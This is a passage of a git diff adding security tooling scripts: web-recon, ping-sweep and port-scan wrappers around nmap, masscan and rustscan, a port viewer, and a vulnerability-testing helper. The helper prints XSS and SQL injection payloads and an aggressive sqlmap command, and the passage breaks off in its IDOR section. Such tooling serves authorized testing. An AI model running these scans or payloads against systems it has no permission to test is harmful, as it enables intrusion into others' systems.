' Waiting...'; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && [ -s urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||||
|
|
||||||
|
# Focus back on top-left pane (nuclei)
|
||||||
|
tmux select-pane -t 1
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux web-recon window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
|
||||||
|
echo -e "${YELLOW}Note:${NC} Arjun waits 10 seconds before starting"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_scans_sequential() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running nuclei...${NC}"
|
||||||
|
command -v nuclei &>/dev/null && nuclei -u "$url" -o nuclei.txt || echo "nuclei not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
|
||||||
|
if command -v feroxbuster &>/dev/null; then
|
||||||
|
timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
|
||||||
|
cat feroxbuster.txt 2>/dev/null | awk '{print $1}' >> urls.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running katana...${NC}"
|
||||||
|
if command -v katana &>/dev/null; then
|
||||||
|
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||||
|
cat katana.txt 2>/dev/null | sort -u >> urls.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running arjun...${NC}"
|
||||||
|
if command -v arjun &>/dev/null; then
|
||||||
|
arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log
|
||||||
|
[ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
|
||||||
|
fi
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
url="$1"
|
||||||
|
|
||||||
|
# Validate URL
|
||||||
|
if [[ -z "$url" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} URL required"
|
||||||
|
echo "Usage: web-recon <url>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run web reconnaissance
|
||||||
|
run_web_recon "$url"
|
||||||
43
scripts/ping-sweep.py
Normal file
43
scripts/ping-sweep.py
Normal file
|
|
@ -0,0 +1,43 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
|
||||||
|
def ping_sweep(network_prefix):
|
||||||
|
live_hosts = []
|
||||||
|
|
||||||
|
for i in range(1, 254):
|
||||||
|
ip = f'{network_prefix}.{i}'
|
||||||
|
print(f'Pinging {ip}...', end='')
|
||||||
|
result = subprocess.run(
|
||||||
|
['ping', '-c', '1', '-W', '1', ip],
|
||||||
|
stdout=subprocess.DEVNULL
|
||||||
|
)
|
||||||
|
if result.returncode == 0:
|
||||||
|
print('Host is up')
|
||||||
|
live_hosts.append(ip)
|
||||||
|
else:
|
||||||
|
print('No response')
|
||||||
|
|
||||||
|
return live_hosts
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
# hosts = ping_sweep('192.168.1')
|
||||||
|
# print('\nLive hosts:')
|
||||||
|
# print('\n'.join(hosts))
|
||||||
|
|
||||||
|
|
||||||
|
# Entry point
|
||||||
|
if __name__ == "__main__":
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print("Usage: python3 pingsweep.py <network_prefix>")
|
||||||
|
print("Example: python3 pingsweep.py 192.168.1")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
prefix = sys.argv[1]
|
||||||
|
hosts = ping_sweep(prefix)
|
||||||
|
|
||||||
|
print("\nLive hosts:")
|
||||||
|
for host in hosts:
|
||||||
|
print(host)
|
||||||
9
scripts/ping-sweep.sh
Normal file
9
scripts/ping-sweep.sh
Normal file
|
|
@ -0,0 +1,9 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# ip=$1
|
||||||
|
|
||||||
|
echo "Scanning..."
|
||||||
|
for ip in $(seq 1 255); do
|
||||||
|
ping -c 1 -W 1 192.168.1.$ip | grep "64 bytes" | awk '{print $4}' | tr -d ':'
|
||||||
|
done
|
||||||
|
|
||||||
19
scripts/pix
Executable file
19
scripts/pix
Executable file
|
|
@ -0,0 +1,19 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: pix
|
||||||
|
# Description: View images in terminal with mpv
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: pix image.jpg
|
||||||
|
# pix *.png
|
||||||
|
# pix ~/Pictures/
|
||||||
|
|
||||||
|
if ! command -v mpv &>/dev/null; then
|
||||||
|
echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
exec mpv \
|
||||||
|
--image-display-duration=inf \
|
||||||
|
--loop-file=inf \
|
||||||
|
"$@"
|
||||||
55
scripts/port-scanner.py
Executable file
55
scripts/port-scanner.py
Executable file
|
|
@ -0,0 +1,55 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import common_ports
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=False):
|
||||||
|
open_ports = []
|
||||||
|
|
||||||
|
# Try resolving the target
|
||||||
|
try:
|
||||||
|
ip_addr = socket.gethostbyname(target)
|
||||||
|
except socket.gaierror:
|
||||||
|
if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
|
||||||
|
return "Error: Invalid IP address"
|
||||||
|
else:
|
||||||
|
return "Error: Invalid hostname"
|
||||||
|
|
||||||
|
# Build the list of ports from range
|
||||||
|
ports_list = list(range(port_range[0], port_range[1] + 1))
|
||||||
|
|
||||||
|
for port in ports_list:
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.settimeout(1)
|
||||||
|
result = s.connect_ex((ip_addr, port))
|
||||||
|
if result == 0:
|
||||||
|
open_ports.append(port)
|
||||||
|
s.close()
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Output
|
||||||
|
if verbose:
|
||||||
|
try:
|
||||||
|
hostname = socket.gethostbyaddr(ip_addr)[0]
|
||||||
|
except socket.herror:
|
||||||
|
hostname = target
|
||||||
|
|
||||||
|
output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
|
||||||
|
try:
|
||||||
|
import common_ports
|
||||||
|
for port in open_ports:
|
||||||
|
service = common_ports.ports_and_services.get(port, 'unknown')
|
||||||
|
output += f"{port:<9}{service}\n"
|
||||||
|
except ImportError:
|
||||||
|
for port in open_ports:
|
||||||
|
output += f"{port:<9}unknown\n"
|
||||||
|
return output.strip()
|
||||||
|
|
||||||
|
return open_ports
|
||||||
|
|
||||||
|
|
||||||
|
print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||||
226
scripts/ports
Executable file
226
scripts/ports
Executable file
|
|
@ -0,0 +1,226 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: ports
|
||||||
|
# Description: Enhanced port viewer with colors, filtering, and process info
|
||||||
|
# Usage: ports # Show all ports (colorized)
|
||||||
|
# ports -l # Listening only (most common)
|
||||||
|
# ports -p # Show process names
|
||||||
|
# ports 80 # Find what's on port 80
|
||||||
|
# ports tcp # TCP only
|
||||||
|
# ports udp # UDP only
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "\033[1mports\033[0m - Enhanced Port Viewer v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mUSAGE:\033[0m"
|
||||||
|
echo " ports [OPTIONS] [PORT|PROTOCOL]"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mOPTIONS:\033[0m"
|
||||||
|
echo -e " \033[0;36m-l, --listen\033[0m Show listening ports only (default)"
|
||||||
|
echo -e " \033[0;36m-a, --all\033[0m Show all connections"
|
||||||
|
echo -e " \033[0;36m-p, --process\033[0m Show process names/PIDs"
|
||||||
|
echo -e " \033[0;36m-n, --numeric\033[0m Don't resolve hostnames"
|
||||||
|
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mFILTERS:\033[0m"
|
||||||
|
echo " ports 80 # Show what's on port 80"
|
||||||
|
echo " ports tcp # TCP connections only"
|
||||||
|
echo " ports udp # UDP connections only"
|
||||||
|
echo " ports 8000-9000 # Port range"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||||
|
echo " ports # Listening ports (colorized)"
|
||||||
|
echo " ports -p # With process info"
|
||||||
|
echo " ports -a # All connections"
|
||||||
|
echo " ports 443 # What's on HTTPS port"
|
||||||
|
echo " ports tcp -p # TCP with processes"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mCOLOR LEGEND:\033[0m"
|
||||||
|
echo -e " \033[0;32mLISTEN\033[0m - Listening for connections"
|
||||||
|
echo -e " \033[0;34mESTABLISHED\033[0m - Active connection"
|
||||||
|
echo -e " \033[1;33mTIME_WAIT\033[0m - Connection closing"
|
||||||
|
echo -e " \033[0;31mCLOSE_WAIT\033[0m - Waiting to close"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Colorize state
|
||||||
|
colorize_state() {
|
||||||
|
local state=$1
|
||||||
|
case "$state" in
|
||||||
|
LISTEN)
|
||||||
|
echo -e "${GREEN}${state}${NC}"
|
||||||
|
;;
|
||||||
|
ESTABLISHED)
|
||||||
|
echo -e "${BLUE}${state}${NC}"
|
||||||
|
;;
|
||||||
|
TIME_WAIT|CLOSE_WAIT)
|
||||||
|
echo -e "${YELLOW}${state}${NC}"
|
||||||
|
;;
|
||||||
|
SYN_SENT|SYN_RECV)
|
||||||
|
echo -e "${CYAN}${state}${NC}"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo "$state"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check if port is "interesting" (not in common_ports)
|
||||||
|
is_unusual_port() {
|
||||||
|
local port=$1
|
||||||
|
local common_ports=(20 21 22 23 25 53 80 110 143 443 465 587 993 995 3306 5432 6379 8080 8443)
|
||||||
|
|
||||||
|
for p in "${common_ports[@]}"; do
|
||||||
|
if [[ "$port" == "$p" ]]; then
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
show_listen_only=true
|
||||||
|
show_process=false
|
||||||
|
numeric=true
|
||||||
|
filter_proto=""
|
||||||
|
filter_port=""
|
||||||
|
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
-l|--listen)
|
||||||
|
show_listen_only=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-a|--all)
|
||||||
|
show_listen_only=false
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-p|--process)
|
||||||
|
show_process=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-n|--numeric)
|
||||||
|
numeric=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-h|--help)
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
tcp|TCP)
|
||||||
|
filter_proto="tcp"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
udp|UDP)
|
||||||
|
filter_proto="udp"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
[0-9]*)
|
||||||
|
filter_port="$1"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown option: $1" >&2
|
||||||
|
echo "Run 'ports --help' for usage information" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Build ss command
|
||||||
|
ss_cmd="ss -tuln"
|
||||||
|
|
||||||
|
if [[ "$show_listen_only" == "false" ]]; then
|
||||||
|
ss_cmd="ss -tun"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ "$show_process" == "true" ]]; then
|
||||||
|
ss_cmd="sudo ss -tulnp"
|
||||||
|
if [[ "$show_listen_only" == "false" ]]; then
|
||||||
|
ss_cmd="sudo ss -tunp"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Execute and format
|
||||||
|
output=$($ss_cmd)
|
||||||
|
|
||||||
|
# Header
|
||||||
|
echo -e "${BOLD}${CYAN}Active Ports${NC}"
|
||||||
|
echo -e "${BOLD}────────────────────────────────────────────────────────────${NC}"
|
||||||
|
|
||||||
|
# Parse and colorize output
|
||||||
|
echo "$output" | awk -v show_proc="$show_process" -v filter_proto="$filter_proto" -v filter_port="$filter_port" '
|
||||||
|
NR==1 { next } # Skip header from ss
|
||||||
|
|
||||||
|
{
|
||||||
|
proto = $1
|
||||||
|
state = $2
|
||||||
|
local = $5
|
||||||
|
peer = $6
|
||||||
|
process = ""
|
||||||
|
|
||||||
|
# Extract process info if available (last field)
|
||||||
|
if (show_proc == "true" && NF >= 7) {
|
||||||
|
for (i=7; i<=NF; i++) {
|
||||||
|
process = process $i " "
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Filter by protocol
|
||||||
|
if (filter_proto != "" && tolower(proto) !~ tolower(filter_proto)) next
|
||||||
|
|
||||||
|
# Extract port from local address
|
||||||
|
split(local, parts, ":")
|
||||||
|
port = parts[length(parts)]
|
||||||
|
|
||||||
|
# Filter by port
|
||||||
|
if (filter_port != "" && port != filter_port) next
|
||||||
|
|
||||||
|
# Print formatted line
|
||||||
|
printf "%-6s %-12s %-25s %-25s", proto, state, local, peer
|
||||||
|
|
||||||
|
if (process != "") {
|
||||||
|
printf " %s", process
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "\n"
|
||||||
|
}
|
||||||
|
' | while IFS= read -r line; do
|
||||||
|
# Colorize based on state
|
||||||
|
if [[ "$line" =~ LISTEN ]]; then
|
||||||
|
echo -e "$line" | sed "s/LISTEN/${GREEN}LISTEN${NC}/"
|
||||||
|
elif [[ "$line" =~ ESTABLISHED ]]; then
|
||||||
|
echo -e "$line" | sed "s/ESTABLISHED/${BLUE}ESTABLISHED${NC}/"
|
||||||
|
elif [[ "$line" =~ TIME_WAIT ]]; then
|
||||||
|
echo -e "$line" | sed "s/TIME_WAIT/${YELLOW}TIME_WAIT${NC}/"
|
||||||
|
elif [[ "$line" =~ CLOSE_WAIT ]]; then
|
||||||
|
echo -e "$line" | sed "s/CLOSE_WAIT/${RED}CLOSE_WAIT${NC}/"
|
||||||
|
else
|
||||||
|
echo "$line"
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# Summary
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}${CYAN}Summary:${NC}"
|
||||||
|
total=$(echo "$output" | wc -l)
|
||||||
|
echo " Total connections: $((total - 1))"
|
||||||
|
|
||||||
|
if [[ "$show_listen_only" == "true" ]]; then
|
||||||
|
echo -e " ${GREEN}Tip:${NC} Use 'ports -a' to see all connections"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ "$show_process" == "false" ]]; then
|
||||||
|
echo -e " ${GREEN}Tip:${NC} Use 'ports -p' to see process information"
|
||||||
|
fi
|
||||||
10
scripts/prettypath
Executable file
10
scripts/prettypath
Executable file
|
|
@ -0,0 +1,10 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: prettypath
|
||||||
|
# Description: Display $PATH with one directory per line
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: prettypath
|
||||||
|
|
||||||
|
echo "$PATH" | sed 's/:/\
|
||||||
|
/g'
|
||||||
250
scripts/pscan
Executable file
250
scripts/pscan
Executable file
|
|
@ -0,0 +1,250 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: pscan
|
||||||
|
# Description: Unified port scanner wrapper (nmap/masscan/rustscan)
|
||||||
|
# Usage: pscan <target> # Quick scan with best available tool
|
||||||
|
# pscan <target> -f # Full port scan (all 65535)
|
||||||
|
# pscan <target> -u # UDP scan
|
||||||
|
# pscan <target> -v # Version detection
|
||||||
|
# pscan <target> -s # Stealth scan
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}pscan${NC} - Unified Port Scanner Wrapper v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " pscan <target> [OPTIONS]"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OPTIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}-f, --full${NC} Scan all 65535 ports"
|
||||||
|
echo -e " ${CYAN}-t, --top${NC} Scan top 1000 ports (default)"
|
||||||
|
echo -e " ${CYAN}-q, --quick${NC} Quick scan (top 100 ports)"
|
||||||
|
echo -e " ${CYAN}-u, --udp${NC} UDP scan"
|
||||||
|
echo -e " ${CYAN}-v, --version${NC} Version detection"
|
||||||
|
echo -e " ${CYAN}-s, --stealth${NC} Stealth SYN scan"
|
||||||
|
echo -e " ${CYAN}-a, --aggressive${NC} Aggressive scan (OS, version, scripts, traceroute)"
|
||||||
|
echo -e " ${CYAN}-o, --output FILE${NC} Save output to file"
|
||||||
|
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}TOOL PREFERENCE:${NC}"
|
||||||
|
echo " 1. rustscan (fastest, if available)"
|
||||||
|
echo " 2. masscan (fast, if available)"
|
||||||
|
echo " 3. nmap (fallback, always available)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " pscan 192.168.1.1 # Quick scan"
|
||||||
|
echo " pscan 192.168.1.0/24 # Scan subnet"
|
||||||
|
echo " pscan 10.10.10.5 -f # Full port scan"
|
||||||
|
echo " pscan target.com -v # Version detection"
|
||||||
|
echo " pscan 10.0.0.1 -s # Stealth scan"
|
||||||
|
echo " pscan 192.168.1.1 -o scan.txt # Save output"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}INSTALLED TOOLS:${NC}"
|
||||||
|
command -v rustscan &>/dev/null && echo -e " ${GREEN}✓${NC} rustscan" || echo -e " ${RED}✗${NC} rustscan (install: cargo install rustscan)"
|
||||||
|
command -v masscan &>/dev/null && echo -e " ${GREEN}✓${NC} masscan" || echo -e " ${RED}✗${NC} masscan (install: sudo apt install masscan)"
|
||||||
|
command -v nmap &>/dev/null && echo -e " ${GREEN}✓${NC} nmap" || echo -e " ${RED}✗${NC} nmap (install: sudo apt install nmap)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Detect best scanner
|
||||||
|
get_scanner() {
|
||||||
|
if command -v rustscan &>/dev/null; then
|
||||||
|
echo "rustscan"
|
||||||
|
elif command -v masscan &>/dev/null; then
|
||||||
|
echo "masscan"
|
||||||
|
elif command -v nmap &>/dev/null; then
|
||||||
|
echo "nmap"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} No port scanner found" >&2
|
||||||
|
echo "Install one: sudo apt install nmap masscan" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Rustscan wrapper
|
||||||
|
scan_rustscan() {
|
||||||
|
local target="$1"
|
||||||
|
local ports="${2:-1-65535}"
|
||||||
|
local extra_args="${3:-}"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Using rustscan for ${BOLD}$target${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Ports: $ports"
|
||||||
|
echo
|
||||||
|
|
||||||
|
rustscan -a "$target" -r "$ports" --ulimit 5000 $extra_args
|
||||||
|
}
|
||||||
|
|
||||||
|
# Masscan wrapper
|
||||||
|
scan_masscan() {
|
||||||
|
local target="$1"
|
||||||
|
local ports="${2:-0-65535}"
|
||||||
|
local rate="${3:-1000}"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Using masscan for ${BOLD}$target${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Ports: $ports | Rate: $rate pps"
|
||||||
|
echo
|
||||||
|
|
||||||
|
sudo masscan "$target" -p"$ports" --rate="$rate" --open
|
||||||
|
}
|
||||||
|
|
||||||
|
# Nmap wrapper
|
||||||
|
scan_nmap() {
|
||||||
|
local target="$1"
|
||||||
|
local scan_type="${2:--sS}"
|
||||||
|
local ports="${3:--p-}"
|
||||||
|
local extra_args="${4:-}"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Using nmap for ${BOLD}$target${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Scan type: $scan_type | Ports: $ports"
|
||||||
|
echo
|
||||||
|
|
||||||
|
sudo nmap "$scan_type" "$ports" $extra_args "$target"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
target="$1"
|
||||||
|
shift
|
||||||
|
|
||||||
|
# Default settings
|
||||||
|
mode="top"
|
||||||
|
scan_type="tcp"
|
||||||
|
output_file=""
|
||||||
|
scanner=$(get_scanner)
|
||||||
|
aggressive=false
|
||||||
|
version_detect=false
|
||||||
|
stealth=false
|
||||||
|
|
||||||
|
# Parse options
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
-f|--full)
|
||||||
|
mode="full"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-t|--top)
|
||||||
|
mode="top"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-q|--quick)
|
||||||
|
mode="quick"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-u|--udp)
|
||||||
|
scan_type="udp"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-v|--version)
|
||||||
|
version_detect=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-s|--stealth)
|
||||||
|
stealth=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-a|--aggressive)
|
||||||
|
aggressive=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-o|--output)
|
||||||
|
output_file="$2"
|
||||||
|
shift 2
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown option: $1"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Build scan command based on scanner and options
|
||||||
|
case "$scanner" in
|
||||||
|
rustscan)
|
||||||
|
case "$mode" in
|
||||||
|
full)
|
||||||
|
ports="1-65535"
|
||||||
|
;;
|
||||||
|
top)
|
||||||
|
ports="1-10000"
|
||||||
|
;;
|
||||||
|
quick)
|
||||||
|
ports="1-1000"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
extra_args=""
|
||||||
|
[[ -n "$output_file" ]] && extra_args="$extra_args -o $output_file"
|
||||||
|
|
||||||
|
scan_rustscan "$target" "$ports" "$extra_args"
|
||||||
|
;;
|
||||||
|
|
||||||
|
masscan)
|
||||||
|
case "$mode" in
|
||||||
|
full)
|
||||||
|
ports="0-65535"
|
||||||
|
rate="10000"
|
||||||
|
;;
|
||||||
|
top)
|
||||||
|
ports="1-10000"
|
||||||
|
rate="5000"
|
||||||
|
;;
|
||||||
|
quick)
|
||||||
|
ports="1-1000"
|
||||||
|
rate="1000"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
[[ -n "$output_file" ]] && extra_args="$extra_args -oL $output_file"
|
||||||
|
|
||||||
|
scan_masscan "$target" "$ports" "$rate"
|
||||||
|
;;
|
||||||
|
|
||||||
|
nmap)
|
||||||
|
# Build nmap arguments
|
||||||
|
if [[ "$stealth" == "true" ]]; then
|
||||||
|
nmap_scan="-sS"
|
||||||
|
elif [[ "$scan_type" == "udp" ]]; then
|
||||||
|
nmap_scan="-sU"
|
||||||
|
else
|
||||||
|
nmap_scan="-sS"
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$mode" in
|
||||||
|
full)
|
||||||
|
nmap_ports="-p-"
|
||||||
|
;;
|
||||||
|
top)
|
||||||
|
nmap_ports="--top-ports 1000"
|
||||||
|
;;
|
||||||
|
quick)
|
||||||
|
nmap_ports="--top-ports 100"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
nmap_extra=""
|
||||||
|
[[ "$version_detect" == "true" ]] && nmap_extra="$nmap_extra -sV"
|
||||||
|
[[ "$aggressive" == "true" ]] && nmap_extra="$nmap_extra -A"
|
||||||
|
[[ -n "$output_file" ]] && nmap_extra="$nmap_extra -oN $output_file"
|
||||||
|
|
||||||
|
scan_nmap "$target" "$nmap_scan" "$nmap_ports" "$nmap_extra"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}[✓]${NC} Scan complete"
|
||||||
|
[[ -n "$output_file" ]] && echo -e "${GREEN}[✓]${NC} Output saved to: $output_file"
|
||||||
74
scripts/quick-vuln-test.sh
Executable file
74
scripts/quick-vuln-test.sh
Executable file
|
|
@ -0,0 +1,74 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Quick vulnerability testing helper
|
||||||
|
# Usage: quick-vuln-test.sh <url> <type>
|
||||||
|
# Types: xss, sqli, idor, csrf
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
URL="${1:-}"
|
||||||
|
TYPE="${2:-}"
|
||||||
|
|
||||||
|
if [[ -z "$URL" ]] || [[ -z "$TYPE" ]]; then
|
||||||
|
echo "Usage: $0 <url> <type>"
|
||||||
|
echo "Types: xss, sqli, idor, csrf"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$TYPE" in
|
||||||
|
xss)
|
||||||
|
echo "[+] Testing for XSS..."
|
||||||
|
echo "[+] Basic payload: <script>alert(1)</script>"
|
||||||
|
echo "[+] Image payload: <img src=x onerror=alert(1)>"
|
||||||
|
echo "[+] SVG payload: <svg onload=alert(1)>"
|
||||||
|
echo ""
|
||||||
|
echo "[!] Test these in Burp Suite or manually"
|
||||||
|
echo "[!] Document which ones work in your findings"
|
||||||
|
;;
|
||||||
|
|
||||||
|
sqli)
|
||||||
|
echo "[+] Testing for SQL Injection..."
|
||||||
|
echo "[+] Basic test: '"
|
||||||
|
echo "[+] Boolean test: ' OR '1'='1"
|
||||||
|
echo "[+] UNION test: ' UNION SELECT NULL--"
|
||||||
|
echo "[+] Time-based: ' AND SLEEP(5)--"
|
||||||
|
echo ""
|
||||||
|
echo "[!] Use sqlmap for automated testing:"
|
||||||
|
echo "sqlmap -u '$URL' --batch --risk=3 --level=5"
|
||||||
|
;;
|
||||||
|
|
||||||
|
idor)
|
||||||
|
echo "[+] Testing for IDOR..."
|
||||||
|
echo "[+] 1. Create two test accounts"
|
||||||
|
echo "[+] 2. Log in as User A, identify resource ID"
|
||||||
|
echo "[+] 3. Log in as User B, try to access User A's resource"
|
